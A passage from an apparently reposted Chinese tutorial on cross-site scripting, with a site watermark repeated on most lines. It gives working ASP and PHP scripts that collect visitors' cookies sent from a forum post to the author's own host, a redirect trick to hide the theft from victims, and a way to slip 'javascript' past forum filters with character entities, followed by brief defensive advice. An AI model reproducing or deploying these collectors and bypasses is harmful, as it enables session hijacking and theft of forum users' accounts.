7sb红软基地

　　其中http://xxx.xxx.xxx/是大家自己网站空间，cookies.asp是一个asp脚本用于收集7sb红软基地

 7sb红软基地

　　msg后边跟的参数，而参数我们指定的是document.cookie，也就是访问此贴用户的cookie。7sb红软基地

　　cookies.asp的代码是： 7sb红软基地
<%7sb红软基地

　　testfile=Server.MapPath("hun.txt")7sb红软基地

　　msg=Request("msg")7sb红软基地

　　set fs=server.CreateObject("scripting.filesystemobject")7sb红软基地

　　set thisfile=fs.OpenTextFile(testfile，8，True，0)7sb红软基地

　　thisfile.WriteLine(""&msg& "")7sb红软基地

　　thisfile.close7sb红软基地

　　set fs = nothing7sb红软基地

　　%> 7sb红软基地

　　这样所有访问者的cookie都会收集在hun.txt这个文件里7sb红软基地

　　但是访问者访问我们的帖子，同样会访问到我们的网站的，这样不是露馅了吗？呵呵，但只要我们稍做处理7sb红软基地

　　就可以做的相对真实，比如我们加上下面的代码7sb红软基地

　　<script language=vbscript>  7sb红软基地
window.location.href="http://xxx.xxx.xxx"  7sb红软基地
</script>7sb红软基地

　　这个xxx.xxx.xxx最好换成你攻击的网站的域名，这样做的目的是在他访问我们精心构造的网站同时开打他7sb红软基地

　　自己的网站，呵呵，这样是不是会更隐蔽一点呢？7sb红软基地

　　这个cookies.asp和有一个同样作用的cookies.php一样，附代码如下： 7sb红软基地
<?php  7sb红软基地
$info = getenv("QUERY_STRING");  7sb红软基地
if ($info) {  7sb红软基地
$fp = fopen("cookies.txt"，"a");  7sb红软基地
fwrite($fp，$info."/n");  7sb红软基地
fclose($fp);  7sb红软基地
}  7sb红软基地
?>  7sb红软基地

　　但是大部份做的不错的论坛，都过滤了javascript这些字符。不过还是有方法可以利用的，7sb红软基地

　　可以在论坛发的贴里将javascript写成ascii码。像j可以写成”&#x6a;” 7sb红软基地
     7sb红软基地
　　防范的方法，就是过滤字符像javascript/<script>/’/;/&/#了等等，7sb红软基地

　　当然前提是你的网页还要正常显示。建议大家不要轻易打开一些不明url，要将自己的信箱、论坛、QQ等资料的密码设的都不一样，7sb红软基地

　　如果一旦资料或密码被盗，避免引连锁反应，所有资料和密码都被别人获得。这就要用到博大精深是社会工程学了。7sb红软基地

　　  总结一下吧。跨站的技巧性很强，呵呵大家多积累经验用起来会达到事半功倍的效果。7sb红软基地

来源：红讯频道